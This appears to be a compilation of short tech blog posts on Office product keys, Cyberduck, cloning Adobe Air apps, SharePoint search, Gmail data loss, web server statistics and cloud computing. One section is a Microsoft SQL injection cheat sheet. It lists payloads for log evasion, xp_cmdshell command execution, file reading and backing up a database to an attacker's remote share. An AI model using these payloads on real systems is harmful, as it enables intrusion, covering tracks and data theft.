Lost product keys

A few years back I stumbled upon a utility called Magical Jelly Bean with its intended purpose of finding the product key of installed Microsoft applications, primarily the OS itself as I used this to determine which VLK was used for imagine deployment in the datacenters.

Looks like the product has not received updates in awhile and I’ve been trying to find a key recently of my office installation so that I can migrate the install to a new fusion VM.

For starters we can determine the last 5 digits of a product key default in the office application.

:command prompt
\program files\microsoft office\office14\
cscript ospp.vbs /dstatus
::Last 5 characters of installed product key: XXXXX

Alternately we can completely change the product key
:regedit
HKLM\Software\Microsoft\Office\<version>\Registration
Expand the registration key, you will find different keys for the office suites looking like {XXX}
In each one of these look for DigitalProductID and ProductID, delete them, close registry restart the office apps and you will be prompted for a new key.

In office 2010 you can also change the key via the command line, this is new, 2 ways of doing so.
Option 1) Add/Remove programs, locate office, change, new product key (yawnnnnn)
Option 2) Instead of /dstatus argument for OSPP.VBS use /inpkey:XXXXX-XXXX-XXXX (key value)

 

Cloud file management! Cyberduck

Having installed OSX Lion I’ve been on an mission to re-evaluate all of my applications and remove or update those which I am still using.  A key tool i was missing and essential for every Apple is management of cloud storage repositories through 3rd party and to make matters even better support for less known providers protocol support FTP, SFTP, WebDAV, Amazon S3, Windows Azure and Google Storage.

Not just that but it’s free – everyone’s favorite price! Take a look at Cyberduck http://cyberduck.ch/ They also have a version out for Windows.

I’m really happy to see Google Docs support since i’ve been actively using it and trying to find the right place to organize and sort my docs directories.

How to run multiple Adobe Air apps Tweetdeck

Twitter columns can get pretty busy if your tweeting from multiple accounts.
I wanted to find the benefits of utilizing 2 display monitors for separate accounts or in some cases the same accounts with unique columns per screen for tweets based on topics, followers or lists.

An application has been written by Chris Deely named AirAppDuplicator
Download it here

Get started by clicking download and then on AirAppDuplicator.AIR package. Proceed past the warnings to install and trust this product (at your own risk). When the application has finished installing right click to run as Administrator if your in Windows to get the Air Apps to clone, you will only have to do this once.

Last step, navigate to the directory path of the application you want to duplicate, in my case it was Tweetdeck located in c:\program files (x86)\tweetdeck on my windows 7 machine and click to clone. What actually happens is AirAppDuplicator will copy the directory to a similar directory appending 2 at the end of the name.

I haven’t run into any issues yet with multiple instances and i’m not the author of the application. Use at your own risk! 😉

MSSQL Injection Commands and Output

» Microsoft SQL

Payload Description (if any)
‘admin –sp_password sp_traceXXX audit evasion. The sp_password prevents storing clear text passwords in the log files. Appending this after your comments (–) can prevent SQL Injection queries being logged.
select @@version View database version.
select @@servername Misc. information disclosure
select @@microsoftversion Misc. information disclosure
select * from master..sysservers Misc. information disclosure
select * from sysusers View database usernames and passwords.
exec master..xp_cmdshell ‘ipconfig+/all’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘net+view’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘net+users’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘ping+system-controlled-by-attacker’ Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed).
BACKUP database master to disks=’\\{IP}\{sharename}\backupdb.dat’ Backup entire database to a file. This attack can be used to steal a database.
create table myfile (line varchar(8000))” bulk insert foo from ‘c:\inetpub\wwwroot\auth.asp’” select * from myfile”– Reading files on the filesystem.
xp_servicecontrol (START or STOP) Start and stop Windows Services.
str1 + str2 OR n+n Concat strings for blind SQL Injection tests.

A simple query

Advanced Search in Sharepoint 2007

Recently I’ve been working on a deployment of an enterprise sharepoint portal for a friend of mine and building it from the ground up utilizing all there is available in sharepoint we got to the point where the next step was search functionality.   There is a lot of documentation out there regarding how to setup search and I think i’ll just make a video for that later on however I wanted to touch on a topic of how to utilize search after it’s actually setup.

You might notice your sharepoint portal site is default searching ‘This Site:’ and that doesn’t exactly work out the way it should, seems like it searches nothing at all.

An easy fix in doing so, first backup a  copy of SearchArea.xml to SearchArea.xml.bak for example, it’s located in C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\TEMPLATE\FEATURES\OSearchEnhancedFeature\

Then edit the file and make the following changes

Change UseSiteDefaults from True to False
Right above this entry add DropDownMode and set the value to ShowDD

Happy Searching!!

Gmail and cloud computing data integrity

Chances are everyone has a Gmail account today, whether they use it or not the popularity
of Gmail has gone from invitation only 10 years ago to free open registration and use today. Popularity basis of Gmail is ranked next to that of Hotmail.com, Yahoo.com and Aol.com email addresses by my own research study.  In addition, Gmail users also count for every Android device as one of these accounts is required to activate on the mobile.

How much value is put into mail availability?  In addition that includes not only messages but contacts, tasks, conversations and all of the other social media channels available through the major players.  Some users never delete anything their Mailbox is something along the lines of a database and it has archives of every conversation.

The reality how would one take the total loss of all contents from their Gmail account, such a terrifying thought just happened over the weekend and although the impact was 500,000 users in actuality based on an Engadget.com report this is only about 0.29% of all Google Gmail users.  That is very impressive number of users although considering it is a free service.  Lucky for me I was not affected by this catastrophic loss of data however I couldn’t stress the importance of backups.  Setup a carbon copy forwarder for all of your messages, I personally dupe mine between @Hotmail and @Gmail this way I have redundancy and a free widely used web service available from anywhere on the internet.

The idea here is that your email is in the cloud and your information is highly available, fast and accessible from anywhere but that’s only as long as you have a backup copy of it. Gmail is a free service and while their engineers are working on recovery for all of its users, cloud computing service are only as resilient as what the end-user has signed up to become and the price to pay for complete data availability.

Loss of data is no fun and it can be a disaster if the backups are not in place considering the medium that is effected such data loss can turn a company or end user upside down. These fallouts are not new to us although generally speaking we aren’t worried about it unless it happens to us.

Just last month in early January of this year, Hotmail.com lost all email for 17,355 customers and while it took about 3 days to get customers mailboxes back not all of them were able to be recovered says the report on InfoWorld here.

Does this change your thoughts when it comes to cloud computing and will you start backing up your information today?

 

Netcraft releases February 2011 Web Server Survey

Are more people using Apache?
With 9.6M new hostnames  there is a 1% point increase in the market share this year from a survey of 284,842,077 site responses.

Reports from Netcraft sourced here are shown indicating that a significant contribution to Apache increases were seen the most at AmeriNOC (4.6M) and Softlayer (1.3M) and while Microsoft and Google both lost hostnames and market share these months there are thoughts on this sudden increase in Apache gains are generating traction from the CMS suites, Drupal, WordPress, Joomla w/ Apache.

Developer January 2011 Percent February 2011 Percent Change
Apache 58,623,115 57.57% 59,595,889 57.35% -0.21
Microsoft 17,070,240 16.76% 16,359,585 15.74% -1.02
Google 12,115,707 11.90% 11,946,570 11.50% -0.40
nginx 8,376,958 8.23% 8,688,338 8.36% 0.14
lighttpd 527,225 0.52% 598,339 0.58% 0.06

We find that the decissions when it comes to hosting are primarily up to the developers and their support for the applications.  While there is no greater of the 2 the open source presence is showing its gains and adaption to CMS suites.   The media industry has been speaking out through the CMS platforms and what better place to start than an infiniCloud, with no contracts, no setup fee you can select your community template, whether it be Windows or Linux and start servicing your projects today.  Sign up here @ infiniCloud.

Cloud and thin clients, the past is future

Cloud – repurpose your old machine with Jolicloud 1.1, download.

Recycle any computer with a useable lightweight web operating system.
For those that are waiting to try out Google chrome OS, this is the product available.

While there are no real benefits in replacing your Win7 or MacOS this is a great operating system available to show the direction we are moving. Away from the heavy operating systems loaded with features that may or may not be needed.

Imagine logging onto your computer by authenticating through Facebook Connect, or Google Gmail (chrome) and then every document you save being stored in the cloud. Turn off your computer, turn on another computer, and restart right where you left off.

I have about a dozen machines and all too often I’m digging up legacy files stuffed in a folder or on a hard disk that I never remembered to relocate. The closest I got was enabling desktop redirection and my documents redirection on a domain controller, but even that had its level of fault… I had to be within that network.

So Jolicloud 1.1 has HTML5, is this push in the direction away from what Apple is trying to bring us? The interface itself looks very iPad/Android’ish. Well super simple and highly effective almost like what the ‘Start’ menu button was to us for over a decade. For anyone wanting Google chrome OS, see if you can get your hands on a CR-48 laptop apply to the Pilot-Program or check on Ebay.

Such features of cloud computing are ever changing, it has been 2 years and the expanding of cloud movement from what started with vmware and other virtual platforms to a broader scale of devices now reaching the end user more than ever. Logicworks recently launched an infiniCloud service that appeals to the public cloud with hybrid growth capabiility it has allowed the provisioning high performing westmere based vms into an easy to afford solution and with no contracts or commitment requirements. With this its now possible for new projects to come up, spin the wheels and then pause or re-provision for new application projects all at the click of a button.

Data Center Containers showing signs of growth

 

We first heard word of these Data Center containers in 2005 where it was said that a parking lot would be filled with containers resembling that of a shipping crate and inside would be a complete technology powerhouse.  One of the first cases to date which we heard about was from Google and they didn’t want to keep it a secret from us, they said it was much to fun to talk about.

Today Microsoft picks Virginia for their next major data center and to our surprise what has shown up is a Microsoft IT-PAC container.  Microsoft has selected Virginia for this new data center project and has plans to invest up to $499 million in the rural community on the southern part of the state.  The goal of this facility is to become the East Coast hub of all Microsoft online services.

During the point of bidding for the location Microsoft was also looking at neighboring North Carolina to win this huge project.  Virginia officials are welcoming Microsoft on this pitched battle which will create 50 new jobs.

Microsoft is adding capacity, mobility and advancing their technology in preparations for its battle with Google and other leading players in Cloud Computing.

This next-generation design gives Microsoft the ability to scale beyond the bricks of a Data Center facility in favor of the container structures, leaving the facility open to the air was guided by a research project which the company housed for eight months.

Microsoft and Google are not the only companies building container data centers.

Other Commercial Containers:

  • Rackable ICE Cube
  • HP POD
  • Verari Forest Container
  • IBM Portal Modular Data Center
  • Sun MD S20

    Read full story here.